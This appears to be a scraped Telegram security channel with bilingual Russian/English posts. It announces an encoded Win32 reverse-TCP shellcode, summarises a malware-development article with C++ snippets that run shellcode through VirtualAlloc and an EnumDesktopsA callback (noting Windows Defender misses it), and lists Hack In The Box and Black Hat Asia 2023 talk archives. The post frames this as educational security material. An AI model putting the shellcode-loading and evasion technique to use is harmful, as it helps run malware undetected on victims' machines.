|Список тегов|#tails #whonix #qubeOS #tor #anonymity #security #deanonymization #decrypt #decipher #CSA #CISA #FBI #wireshark #privacy #https #appsec #forensics #course #collection #investigation #android #cve #bootkit #exploitation #sandbox #hacking #cheatsheet #searchEngine #duckduckgo #ezine #news #infosec #appsec #malware #security #cryptography #Shellcode #privilegeelevation #veracrypt #antiforensics #leak #exploitDev #LKM #chromium #Edge #dump #extract #edr #poc #NSA #FBI #GRU #cryptography #phishing #vm #stealer #escapeVM #iot #mobileCommunication #gsm #ss7 #3g #gps #LTE #5G #sms #xmr #RCE #2FA #SE #bypass #VMware #OS #XDR #EDR #networks #smartcard #shizo #i2p #BTC #google #car #hackrf #vpn #meshNetworking #exploit #ransomware #decrypt #messenger #searchEngine #reverseshell #RAT #cryptocurrency #Ethereum #ICS #course #stealing #geolocation #automotive #mfa #book #backdoor #identification #av #deobfuscation #powershell #reverseShell #rootkit #ATM #nix #vulnerability #censorship #telegram #fingerprint #IP #obfs4 #cryptocurrency #xmr #p2p #freenet #malware #extention #osint #addon #spoof #fingerprint #router #PRC #sim #cellularCommunication #vpn #simjacker #mfa #cybersec #timeAttack #zer0day #chromium
|List of tags|
👍2
|WIn32 Encrypted/encoded reverse tcp Shellcode|
🛡Только в образовательных целях
Автор шеллкода: Xenofon Vassilakopoulos
🦠Шеллкод для винды x86(reverse tcp (192.168.201.11:4444)) зашифрованный/закодированный с помощью криптора XDNR(XOR/DEC/NOT/ROR). Также, у него есть тулза для декрипта и исполнения XDNR encrypted / encoded шеллкодов .
Так он компилится:
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcrevenc.cpp /link /OUT:revenc.exe /SUBSYSTEM:CONSOLE /MACHINE:x86
Вот, собственно серия статей от автора шеллкода про его написание:
🖊Win32 reverse shellcode - pt .1 - Locating the kernelbase.dll address
🖊Win32 reverse shellcode - pt .2 - locating the Export Directory Table
🖊Win32 reverse shellcode - pt .3 - Constructing the reverse shellcode
⬇️Зашифрованный и голый шеллкод прикладываю ниже ⬇️
🛡For educational purposes only!
Shellcode author: Xenofon Vassilakopoulos
🦠Shellcode for x86 windows(reverse tcp (192.168.201.11:4444)) encrypted/encoded using the XDNR cryptor(XOR/DEC/NOT/ROR). Also, he has a tool for decrypting and executing XDNR encrypted / encoded shellcodes .
This is how it compiles:
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcrevenc.cpp /link /OUT:revenc.exe /SUBSYSTEM:CONSOLE /MACHINE:x86
Here, in fact, is a series of articles from the author of the shellcode about writing it:
🖊Win32 reverse shellcode - pt .1 - Locating the kernelbase.dll address
🖊Win32 reverse shellcode - pt .2 - locating the Export Directory Table
🖊Win32 reverse shellcode - pt .3 - Constructing the reverse shellcode
⬇️ I attach the encrypted and clear shellcode below ⬇️
#Shellcode
🛡Только в образовательных целях
Автор шеллкода: Xenofon Vassilakopoulos
🦠Шеллкод для винды x86(reverse tcp (192.168.201.11:4444)) зашифрованный/закодированный с помощью криптора XDNR(XOR/DEC/NOT/ROR). Также, у него есть тулза для декрипта и исполнения XDNR encrypted / encoded шеллкодов .
Так он компилится:
🖊Win32 reverse shellcode - pt .1 - Locating the kernelbase.dll address
🖊Win32 reverse shellcode - pt .2 - locating the Export Directory Table
🖊Win32 reverse shellcode - pt .3 - Constructing the reverse shellcode
⬇️Зашифрованный и голый шеллкод прикладываю ниже ⬇️
🛡For educational purposes only!
Shellcode author: Xenofon Vassilakopoulos
🦠Shellcode for x86 windows(reverse tcp (192.168.201.11:4444)) encrypted/encoded using the XDNR cryptor(XOR/DEC/NOT/ROR). Also, he has a tool for decrypting and executing XDNR encrypted / encoded shellcodes .
This is how it compiles:
🖊Win32 reverse shellcode - pt .1 - Locating the kernelbase.dll address
🖊Win32 reverse shellcode - pt .2 - locating the Export Directory Table
🖊Win32 reverse shellcode - pt .3 - Constructing the reverse shellcode
⬇️ I attach the encrypted and clear shellcode below ⬇️
#Shellcode
👍1
|Run shellcode via EnumDesktopsA|
🤙Шизо на связи!
🛡Только в ознакомительных целях!
🦠Статья от известного в узких кругах cocomelonc'a(на канале: AV engines evasion,
Malware development: persistence) про запуск шеллкода посредством EnumDesktopsA из серии "Malware development tricks".
Предыдущие из серии:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
Сама по себе функция
Причём, может оперировать только теми рабочими столами, вызывающий процесс которых имеет право доступа
Конечно же программа на C++, моём любимом и одновременно ненавидимом.
Для запуска шеллкода, помимо его наличия, нам потребуется сперва проаллоцировать буффер памяти(ну или выделить, кто как говорит) посредством функцию
WinDef.h:
Детект: 16/66(windows defender - не детектит)
📝Исходный код тут.
🤙The Shizo is in touch!
🛡For educational purposes only
🦠An article from the well-known cocomelonc in narrow circles (on the channel: AV engines evasion,
Malware development: persistence) about running the shellcode via EnumDesktopsA from the series "Malware development tricks".
Previous ones from the series:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
The
Moreover, it can operate only on those desktops whose calling process has the right to access
Of course, the program is in C++, my favorite and at the same time hated.
To run the shellcode, in addition to having it, we will first need to allocate a memory buffer (well, or allocate, as anyone says) using the
Detection: 16/66(windows defender - does not detect)
📝The source code is here.
#malware #shellcode #njection
🤙Шизо на связи!
🛡Только в ознакомительных целях!
🦠Статья от известного в узких кругах cocomelonc'a(на канале: AV engines evasion,
Malware development: persistence) про запуск шеллкода посредством EnumDesktopsA из серии "Malware development tricks".
Предыдущие из серии:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
Сама по себе функция
EnumDesktopsA нужна для передачи имени каждого рабочего стола определяемой приложением(application-defined) callback-функции и подключается с помощью хэдера winuser.h.Причём, может оперировать только теми рабочими столами, вызывающий процесс которых имеет право доступа
DESKTOP_ENUMERATE.Конечно же программа на C++, моём любимом и одновременно ненавидимом.
Для запуска шеллкода, помимо его наличия, нам потребуется сперва проаллоцировать буффер памяти(ну или выделить, кто как говорит) посредством функцию
VirtualAlloc:LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);Если вдруг кому интересно LPVOID - это указатель на любой тип, который определён в хэдере
WinDef.h:
typedef void *LPVOID;Далее, нужно "скопировать" наш пэйлоад(шеллкод) в эту область памяти:
RtlMoveMemory(mem, my_payload, sizeof(my_payload));После чего, в EnumDesktopsA укажем эту область памяти , как указатель на коллбэк функцию:
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
my_payload, если вдруг кто не понял - как раз наш пэйлоад.Детект: 16/66(windows defender - не детектит)
📝Исходный код тут.
🤙The Shizo is in touch!
🛡For educational purposes only
🦠An article from the well-known cocomelonc in narrow circles (on the channel: AV engines evasion,
Malware development: persistence) about running the shellcode via EnumDesktopsA from the series "Malware development tricks".
Previous ones from the series:
💥Download & inject logic + source code
💥Find kernel32.dll base: asm style + source code
The
EnumDesktopsA function itself is needed to pass the name of each desktop to an application-defined callback function and is connected using a header winuser.h.Moreover, it can operate only on those desktops whose calling process has the right to access
DESKTOP_ENUMERATE.Of course, the program is in C++, my favorite and at the same time hated.
To run the shellcode, in addition to having it, we will first need to allocate a memory buffer (well, or allocate, as anyone says) using the
VirtualAlloc function:LPVOID mem = VirtualAlloc(NULL, sizeof(my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);If anyone is suddenly interested, LPVOID is a pointer to any type that is defined in the header WinDef.h:
typedef void *LPVOID;Next, we need to "copy" our payload (shellcode) to this memory area:
RtlMoveMemory(mem, my_payload, sizeof(my_payload));After that, in EnumDesktopsA we will indicate this memory area as a pointer to the callback function:
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
my_payload, if suddenly someone did not understand - just our payload.Detection: 16/66(windows defender - does not detect)
📝The source code is here.
#malware #shellcode #njection
👍4❤2
HITB2023AMS.zip
232.2 MB
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Hack In The Box 2023 Amsterdam и укомплектовал в архив.
🗃Your humble servant downloaded all currently available presentations from Hack In The Box 2023 Amsterdam and archived them.
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP
🗃Your humble servant downloaded all currently available presentations from Hack In The Box 2023 Amsterdam and archived them.
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP
❤14🔥5👍2🤡1👾1
BHasia2023.zip
914.5 MB
🗃Ваш покорный слуга скачал все доступные на данный момент презентации с Black Hat Asia 2023 и укомплектовал в архив.
🗃Your humble servant downloaded all currently available presentations from Black Hat Asia 2023 and archived them.
#BHasia #security #Bugs #expoitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
🗃Your humble servant downloaded all currently available presentations from Black Hat Asia 2023 and archived them.
#BHasia #security #Bugs #expoitation #cryptography #Kernel #linux #ebpf #IoT #APT #espionage #CTI #DFIR #malware #privacy #mobile #GooglePixel #Rooting #Android #RF #HW #FW #RE #LockPick #JS #PrototypePollution #RCE #InsiderThreats #TTP #PMFault #FaultInjection #Windows #PPL #ransomware #AI #ML #DataScience #detection #OT #PLCs #RTUs #Schneider #LateralMovement #Arm #CodeInjection #WiFi #WPA3 #MCU #SCA #TimingAttacks #Chrome #fuzzing #WebSQL #hybridWar #Java #Gadgets_SSRF_RCE #EPZ #NTFS #LPE #Webkit #WASM #DNS #CFG #ETW #Shellcode #immutableCode #supplyChainAttacks #CriticalInfrastructure #IIoT
🔥22❤4👍3
0% Privacy
BHasia2023.zip
BHasia2023ToolsPoCs.zip
4.4 MB
🧰С некоторыми выступлениями с Black Hat Asia 2023 были представлены инструменты и PoCs, их тоже скачал и укомплектовал в архив(внутри есть txt-файл "List.txt", который содержит ссылки на оные и название докладов вместе с которыми были они предствалены).
🧰With some presentations from Black Hat Asia 2023, tools and POCs were presented, I also downloaded them and archived them (inside there is a txt file "List.txt" that contains links to them and the name of the presentation with which they were presented).
#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
🧰With some presentations from Black Hat Asia 2023, tools and POCs were presented, I also downloaded them and archived them (inside there is a txt file "List.txt" that contains links to them and the name of the presentation with which they were presented).
#BHasiaTools #security #Graph #TTPs #exploitation #RE #Arm #CodeInjection #Network #cryptography #WiFi #WiFi_Framework #transmitQueueManipulations #clientIsolationBypasses #intercept #MAC #browsers #WebAssembly #WebKit #fuzzing #XMap #ZMap #ICMP #EchoScans #TCP_SYN_scans #UDPprobes #DNS #malware #Shellcode #memory_scanning #CFG_bitmap #ETW #kernel_telemetry
❤5👍1
0% Privacy
HITB2023AMS.zip
💥Спустя время появились записи выступлений с Hack In The Box 2023 Amsterdam, посему прикладываю ниже список, состоящий из ссылок на оные.
💥After a while, recordings of performances from Hack In The Box 2023 Amsterdam appeared, therefore I attach below a list consisting of links to them.
📺 XRP Raid Protector: Killing A Critical Bug Worth 40 Billion Dollars
📺 Current State Of IOS Malware Detection
📺 Nakatomi Space: Lateral Movement As L1 Post-Exploitation In OT
📺 Syscalls In Shellcode: Techniques For Malicious Functionality
📺 SOHO Hacking At Pwn2Own
📺 Next Generation Virtualization-Based Obfuscators
📺 Bypassing Anti-Cheats And Hacking Competitive Games
📺 Advanced DMA Reentrancy Techniques To Escape QEMU
📺 A Tale Of Building A REAL Full Speed Anti-Censorship Router
📺 Hunting Windows Desktop Window Manager Bugs
📺 ChatGPT Please Write Me A Piece Of Polymorphic Malware
📺 Automated Black-box Security Testing Of “Smart” Embedded Devices
📺 How MySQL Servers Can Attack YOU
📺 PANEL DISCUSSION: iOS / OS X Security
📺 A Deep Dive Into GarminOS And Its MonkeyC Virtual Machine
📺 Active Directory Abuse Primitives And Operation Security
📺 Smart Speaker Shenanigans: Making The SONOS One Sing
📺 Exploiting IPC With New Desynchronization Primitives
📺 CLOSING KEYNOTE - The Hand That Strikes, Also Blocks
📺 Investigating Web3 With OSINT
📺 An Analysis Of Computer Numerical Control Machines In Industry 4.0
📺 Privilege Escalation Using DOP In MacOS
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP #automotive #car #SDR #RFanalysis #MySQL #RedTeam #infrastructure #DMA #QemuEscape #expoitation #Embedded #fw #fuzzing #Ghidra #Gophers #Golang #SONOS #macOS #expoitation #vulnerability #PE #DOP #ChatGPT #polymorphicMalware #KernelDrivers #GarminOS #MonkeyC #FW #VM #ICS #SupplyChain #MTConnect
💥After a while, recordings of performances from Hack In The Box 2023 Amsterdam appeared, therefore I attach below a list consisting of links to them.
📺 XRP Raid Protector: Killing A Critical Bug Worth 40 Billion Dollars
📺 Current State Of IOS Malware Detection
📺 Nakatomi Space: Lateral Movement As L1 Post-Exploitation In OT
📺 Syscalls In Shellcode: Techniques For Malicious Functionality
📺 SOHO Hacking At Pwn2Own
📺 Next Generation Virtualization-Based Obfuscators
📺 Bypassing Anti-Cheats And Hacking Competitive Games
📺 Advanced DMA Reentrancy Techniques To Escape QEMU
📺 A Tale Of Building A REAL Full Speed Anti-Censorship Router
📺 Hunting Windows Desktop Window Manager Bugs
📺 ChatGPT Please Write Me A Piece Of Polymorphic Malware
📺 Automated Black-box Security Testing Of “Smart” Embedded Devices
📺 How MySQL Servers Can Attack YOU
📺 PANEL DISCUSSION: iOS / OS X Security
📺 A Deep Dive Into GarminOS And Its MonkeyC Virtual Machine
📺 Active Directory Abuse Primitives And Operation Security
📺 Smart Speaker Shenanigans: Making The SONOS One Sing
📺 Exploiting IPC With New Desynchronization Primitives
📺 CLOSING KEYNOTE - The Hand That Strikes, Also Blocks
📺 Investigating Web3 With OSINT
📺 An Analysis Of Computer Numerical Control Machines In Industry 4.0
📺 Privilege Escalation Using DOP In MacOS
#HITB2023 #security #API #AV #Fingerprinting #Honeypots #PostExploitation #hacking #shellcode #iOS #windows #malware #bugs #WAN #LAN #AntiCensorship #obfuscation #virtuallization #XRP #automotive #car #SDR #RFanalysis #MySQL #RedTeam #infrastructure #DMA #QemuEscape #expoitation #Embedded #fw #fuzzing #Ghidra #Gophers #Golang #SONOS #macOS #expoitation #vulnerability #PE #DOP #ChatGPT #polymorphicMalware #KernelDrivers #GarminOS #MonkeyC #FW #VM #ICS #SupplyChain #MTConnect
❤6🔥4👍1